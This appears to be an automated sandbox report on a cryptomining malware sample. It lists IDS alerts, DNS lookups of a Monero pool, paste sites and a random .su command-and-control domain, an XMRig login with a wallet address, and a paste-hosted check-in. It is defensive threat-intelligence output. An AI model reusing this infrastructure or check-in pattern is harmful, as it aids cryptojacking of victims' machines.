                                                        English | United States
                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                        2024-10-10T04:56:07.950720+0200 | 2047928 | ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) | 2 | 192.168.2.6 | 61214 | 1.1.1.1 | 53 | UDP
                                                        2024-10-10T04:56:13.700818+0200 | 2044697 | ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 | 1 | 192.168.2.6 | 49760 | 188.114.97.3 | 443 | TCP
                                                        2024-10-10T04:57:08.272795+0200 | 2051004 | ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | 2 | 192.168.2.6 | 65331 | 188.114.97.3 | 443 | TCP
                                                        2024-10-10T04:58:14.573518+0200 | 2051004 | ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | 2 | 192.168.2.6 | 65333 | 188.114.97.3 | 443 | TCP
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Oct 10, 2024 04:56:07.964621067 CEST | 49728 | 443 | 192.168.2.6 | 141.94.96.144
                                                        Oct 10, 2024 04:56:07.964710951 CEST | 443 | 49728 | 141.94.96.144 | 192.168.2.6
                                                        Oct 10, 2024 04:56:07.964803934 CEST | 49728 | 443 | 192.168.2.6 | 141.94.96.144
                                                        Oct 10, 2024 04:56:07.965301037 CEST | 49728 | 443 | 192.168.2.6 | 141.94.96.144
                                                        Oct 10, 2024 04:56:07.965334892 CEST | 443 | 49728 | 141.94.96.144 | 192.168.2.6
                                                        Oct 10, 2024 04:56:08.793833017 CEST | 443 | 49728 | 141.94.96.144 | 192.168.2.6
                                                        Oct 10, 2024 04:56:08.795420885 CEST | 49728 | 443 | 192.168.2.6 | 141.94.96.144
                                                        Oct 10, 2024 04:56:08.795449018 CEST | 443 | 49728 | 141.94.96.144 | 192.168.2.6
                                                        Oct 10, 2024 04:56:08.797419071 CEST | 443 | 49728 | 141.94.96.144 | 192.168.2.6
                                                        Oct 10, 2024 04:56:08.797511101 CEST | 49728 | 443 | 192.168.2.6 | 141.94.96.144
                                                        Oct 10, 2024 04:56:08.799001932 CEST | 49728 | 443 | 192.168.2.6 | 141.94.96.144
                                                        Oct 10, 2024 04:56:08.799092054 CEST | 443 | 49728 | 141.94.96.144 | 192.168.2.6
                                                        Oct 10, 2024 04:56:08.894412041 CEST | 49728 | 443 | 192.168.2.6 | 141.94.96.144
                                                        Oct 10, 2024 04:56:08.894452095 CEST | 443 | 49728 | 141.94.96.144 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.082083941 CEST | 49734 | 443 | 192.168.2.6 | 104.26.3.16
                                                        Oct 10, 2024 04:56:09.082125902 CEST | 443 | 49734 | 104.26.3.16 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.083427906 CEST | 49734 | 443 | 192.168.2.6 | 104.26.3.16
                                                        Oct 10, 2024 04:56:09.093745947 CEST | 49734 | 443 | 192.168.2.6 | 104.26.3.16
                                                        Oct 10, 2024 04:56:09.093801975 CEST | 443 | 49734 | 104.26.3.16 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.099426985 CEST | 49728 | 443 | 192.168.2.6 | 141.94.96.144
                                                        Oct 10, 2024 04:56:09.099453926 CEST | 443 | 49728 | 141.94.96.144 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.249630928 CEST | 49728 | 443 | 192.168.2.6 | 141.94.96.144
                                                        Oct 10, 2024 04:56:09.558774948 CEST | 443 | 49734 | 104.26.3.16 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.560138941 CEST | 49734 | 443 | 192.168.2.6 | 104.26.3.16
                                                        Oct 10, 2024 04:56:09.560188055 CEST | 443 | 49734 | 104.26.3.16 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.561769962 CEST | 443 | 49734 | 104.26.3.16 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.561865091 CEST | 49734 | 443 | 192.168.2.6 | 104.26.3.16
                                                        Oct 10, 2024 04:56:09.563927889 CEST | 49734 | 443 | 192.168.2.6 | 104.26.3.16
                                                        Oct 10, 2024 04:56:09.564027071 CEST | 443 | 49734 | 104.26.3.16 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.564084053 CEST | 49734 | 443 | 192.168.2.6 | 104.26.3.16
                                                        Oct 10, 2024 04:56:09.564099073 CEST | 443 | 49734 | 104.26.3.16 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.674889088 CEST | 49734 | 443 | 192.168.2.6 | 104.26.3.16
                                                        Oct 10, 2024 04:56:09.833076954 CEST | 443 | 49734 | 104.26.3.16 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.833262920 CEST | 443 | 49734 | 104.26.3.16 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.833769083 CEST | 49734 | 443 | 192.168.2.6 | 104.26.3.16
                                                        Oct 10, 2024 04:56:09.847776890 CEST | 49734 | 443 | 192.168.2.6 | 104.26.3.16
                                                        Oct 10, 2024 04:56:09.847824097 CEST | 443 | 49734 | 104.26.3.16 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.892834902 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:09.892926931 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:09.893002033 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:09.901251078 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:09.901287079 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:10.358515024 CEST | 443 | 49728 | 141.94.96.144 | 192.168.2.6
                                                        Oct 10, 2024 04:56:10.581818104 CEST | 49728 | 443 | 192.168.2.6 | 141.94.96.144
                                                        Oct 10, 2024 04:56:10.955677986 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:10.957190037 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:10.957237005 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:10.958883047 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:10.959070921 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:10.960973978 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:10.961074114 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:10.961244106 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:10.961253881 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.113102913 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.649880886 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.649946928 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.649966955 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.650053978 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.650064945 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.650083065 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.650151968 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.650152922 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.650152922 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.650152922 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.650252104 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.650315046 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.650674105 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.650695086 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.650748014 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.650748014 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.650770903 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.650796890 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.650823116 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.650845051 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.650859118 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.650998116 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.660660028 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.660691977 CEST | 443 | 49740 | 83.168.108.45 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.660752058 CEST | 49740 | 443 | 192.168.2.6 | 83.168.108.45
                                                        Oct 10, 2024 04:56:11.808810949 CEST | 49754 | 443 | 192.168.2.6 | 172.67.19.24
                                                        Oct 10, 2024 04:56:11.808845043 CEST | 443 | 49754 | 172.67.19.24 | 192.168.2.6
                                                        Oct 10, 2024 04:56:11.808908939 CEST | 49754 | 443 | 192.168.2.6 | 172.67.19.24
                                                        Oct 10, 2024 04:56:11.825866938 CEST | 49754 | 443 | 192.168.2.6 | 172.67.19.24
                                                        Oct 10, 2024 04:56:11.825891018 CEST | 443 | 49754 | 172.67.19.24 | 192.168.2.6
                                                        Oct 10, 2024 04:56:12.304740906 CEST | 443 | 49754 | 172.67.19.24 | 192.168.2.6
                                                        Oct 10, 2024 04:56:12.306025982 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.306063890 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.307744026 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.307811022 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.309776068 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.309874058 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.310015917 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.310029984 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.394294977 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.687340021 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.687617064 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.688941956 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.691453934 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.691495895 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.691543102 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.942353964 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:12.942421913 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:12.942501068 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:12.951471090 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:12.951508045 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.454374075 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.455425024 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.455446005 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.457010031 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.457088947 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.458786011 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.458884001 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.458961010 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.458976030 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.519293070 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.700867891 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.701220989 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.701353073 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.722997904 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.723037004 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:20.537184000 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:20.597420931 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:32.056132078 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:32.191191912 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:43.685673952 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:43.894296885 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:59.078685999 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:59.285118103 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:57:07.496706963 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.496798992 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:07.497081041 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.507170916 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.507245064 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:07.973392963 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:07.974749088 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.974811077 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:07.978797913 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:07.979082108 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.980671883 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.980843067 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:07.981044054 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.981105089 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:08.037571907 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:08.272869110 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:08.273112059 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:08.273430109 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:08.301243067 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:08.301243067 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:08.301311970 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:09.148890972 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:57:09.285152912 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:57:19.184792995 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:57:19.284917116 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:57:38.590034962 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:57:38.784949064 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:57:55.833451986 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:57:55.894325972 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:58:07.457417965 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:58:07.597558022 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:58:13.833112955 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:13.833226919 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:13.833337069 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:13.835948944 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:13.835988998 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.295286894 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.297399998 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.297440052 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.300668955 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.300790071 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.302176952 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.302262068 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.302452087 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.302469969 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.347418070 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.573539972 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.573662043 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.576139927 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.582097054 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.582133055 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.582165956 CEST65333443192.168.2.6188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 10, 2024 04:56:07.950720072 CEST | 61214 | 53 | 192.168.2.6 | 1.1.1.1
Oct 10, 2024 04:56:07.960619926 CEST | 53 | 61214 | 1.1.1.1 | 192.168.2.6
Oct 10, 2024 04:56:09.071942091 CEST | 62588 | 53 | 192.168.2.6 | 1.1.1.1
Oct 10, 2024 04:56:09.080779076 CEST | 53 | 62588 | 1.1.1.1 | 192.168.2.6
Oct 10, 2024 04:56:09.881417036 CEST | 58552 | 53 | 192.168.2.6 | 1.1.1.1
Oct 10, 2024 04:56:09.892271996 CEST | 53 | 58552 | 1.1.1.1 | 192.168.2.6
Oct 10, 2024 04:56:11.799189091 CEST | 62975 | 53 | 192.168.2.6 | 1.1.1.1
Oct 10, 2024 04:56:11.808322906 CEST | 53 | 62975 | 1.1.1.1 | 192.168.2.6
Oct 10, 2024 04:56:12.760461092 CEST | 65400 | 53 | 192.168.2.6 | 1.1.1.1
Oct 10, 2024 04:56:12.941441059 CEST | 53 | 65400 | 1.1.1.1 | 192.168.2.6
Oct 10, 2024 04:56:40.747997999 CEST | 53 | 61257 | 162.159.36.2 | 192.168.2.6
Oct 10, 2024 04:56:41.221302032 CEST | 53 | 55701 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 10, 2024 04:56:07.950720072 CEST | 192.168.2.6 | 1.1.1.1 | 0x486d | Standard query (0) | pool.supportxmr.com | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:09.071942091 CEST | 192.168.2.6 | 1.1.1.1 | 0x1c55 | Standard query (0) | rentry.co | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:09.881417036 CEST | 192.168.2.6 | 1.1.1.1 | 0x4903 | Standard query (0) | justpaste.it | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:11.799189091 CEST | 192.168.2.6 | 1.1.1.1 | 0x9a3a | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:12.760461092 CEST | 192.168.2.6 | 1.1.1.1 | 0xf149 | Standard query (0) | jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 10, 2024 04:56:07.960619926 CEST | 1.1.1.1 | 192.168.2.6 | 0x486d | No error (0) | pool.supportxmr.com | pool-fr.supportxmr.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 10, 2024 04:56:07.960619926 CEST | 1.1.1.1 | 192.168.2.6 | 0x486d | No error (0) | pool-fr.supportxmr.com | | 141.94.96.71 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:07.960619926 CEST | 1.1.1.1 | 192.168.2.6 | 0x486d | No error (0) | pool-fr.supportxmr.com | | 141.94.96.144 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:07.960619926 CEST | 1.1.1.1 | 192.168.2.6 | 0x486d | No error (0) | pool-fr.supportxmr.com | | 141.94.96.195 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:09.080779076 CEST | 1.1.1.1 | 192.168.2.6 | 0x1c55 | No error (0) | rentry.co | | 104.26.3.16 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:09.080779076 CEST | 1.1.1.1 | 192.168.2.6 | 0x1c55 | No error (0) | rentry.co | | 104.26.2.16 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:09.080779076 CEST | 1.1.1.1 | 192.168.2.6 | 0x1c55 | No error (0) | rentry.co | | 172.67.75.40 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:09.892271996 CEST | 1.1.1.1 | 192.168.2.6 | 0x4903 | No error (0) | justpaste.it | | 83.168.108.45 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:11.808322906 CEST | 1.1.1.1 | 192.168.2.6 | 0x9a3a | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:11.808322906 CEST | 1.1.1.1 | 192.168.2.6 | 0x9a3a | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:11.808322906 CEST | 1.1.1.1 | 192.168.2.6 | 0x9a3a | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:12.941441059 CEST | 1.1.1.1 | 192.168.2.6 | 0xf149 | No error (0) | jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 04:56:12.941441059 CEST | 1.1.1.1 | 192.168.2.6 | 0xf149 | No error (0) | jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                        • rentry.co
                                                        • justpaste.it
                                                        • pastebin.com
                                                        • jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49728 | 141.94.96.144 | 443 | 2248 | C:\Windows\System32\dialer.exe
Timestamp | Bytes transferred | Direction | Data (ASCII)
2024-10-10 02:56:08 UTC | 577 | OUT | {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46iQa3nMfkEG7MFsFYyjsb7CJJqWQnkttG3fQMZQRajx8UpaXrTzGKnPzMRjiE9eMabAgu53ofUpxADyUwtiwMAZCZDg6iw","pass":"232323","agent":"XMRig/6.21.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigid
2024-10-10 02:56:08 UTC | 539 | IN | {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"cc014b54-7c31-42dd-a215-3eddf8ad2cac","job":{"blob":"1010be849db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f3800000000f8780bd8e685c102fda95193c964a32af23780985324fa10f28a99a053d45b1
2024-10-10 02:56:10 UTC | 420 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"1010ca849db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f3800000000e125e7cbc3ba28843dd23b48c150d7da7d1f0ff9a27da2366fb474ac40b17b4704","job_id":"dwXmWngN4fn5UrjttXUptLwRMIRG","target":"8
2024-10-10 02:56:20 UTC | 420 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d4849db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f3800000000819c425a6d2ee2d99c5d45750f71e7b1380e1d9f54a6c42f0626d9b54ff3ffbe07","job_id":"frtOR0D/fKWVi+pS7rrPMPf9bslV","target":"8
2024-10-10 02:56:32 UTC | 420 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"1010df849db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f3800000000ec423aff94f54beb12200bffa4eb7f96874198c24735bb324c3acce6777d40e008","job_id":"+nU/OjfoSC7Aw1gHwDKIiq3/p/w5","target":"8
2024-10-10 02:56:43 UTC | 420 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"1010eb849db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f3800000000b26ffbf524dcb697bdf2a6cd5ddcb162046917bbbd0623a04791ab451eccddf10b","job_id":"0JPOl8b0fKLp5I8LmoEw/TEyQRFk","target":"8
2024-10-10 02:56:59 UTC | 420 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"1010fa849db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f38000000002e5eb40e06e03336a077323fa37fd1457412d34533d0e6732f0f43b57ec0cba30d","job_id":"mCTch3hC3Zz84a3nyOqJUk8MA8Vi","target":"8
2024-10-10 02:57:09 UTC | 420 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"101084859db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f38000000009c7adab1bd711afe069a651cbd28990bec1920fea211ff9957203dfcdf89d7d10f","job_id":"FNjEDTvIvwwxaAGTTKHVcWW6rdUe","target":"8
2024-10-10 02:57:19 UTC | 420 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"10108e859db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f3800000000ffff7a95657e1113d64d8a82e678963d2678fcfc60c95c5a00cfc6d57ee8323010","job_id":"NQvA5a0/VbjF+n0KZCtSt5QHRrYN","target":"8
2024-10-10 02:57:38 UTC | 420 | IN | {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a2859db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f38000000009aa3ac33bfb840a272e7b1bffd11647e4f639594810b78cc0ea008b69951721211","job_id":"sab71zZGGnAnWoOZi+42Btg27L+u","target":"8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49734 | 104.26.3.16 | 443 | 2248 | C:\Windows\System32\dialer.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-10 02:56:09 UTC111OUTGET /5apf98os/raw HTTP/1.1
                                                        Accept: */*
                                                        Connection: close
                                                        Host: rentry.co
                                                        User-Agent: cpp-httplib/0.12.6
                                                        2024-10-10 02:56:09 UTC | 694 | IN | HTTP/1.1 200 OK
                                                        Date: Thu, 10 Oct 2024 02:56:09 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 10
                                                        Connection: close
                                                        vary: Origin
                                                        x-xss-protection: 1; mode=block
                                                        x-content-type-options: nosniff
                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                        Cache-Control: Vary
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2Z81unQGS1IlDhuqFAIW7xGslCFdySImWnjkcxKYiHAzzRff0qqYlm3mJHfyuicYcq11hxH1k7E3tptldNbT%2FSfrX3wxuZGxcN0NutFqGWwNSiGnBouB%2FvCOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8d0355ec3d3515c3-EWR
                                                        2024-10-10 02:56:09 UTC | 10 | IN | Data Raw: 52 45 42 4f 52 4e 20 58 4d 52
                                                        Data Ascii: REBORN XMR


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
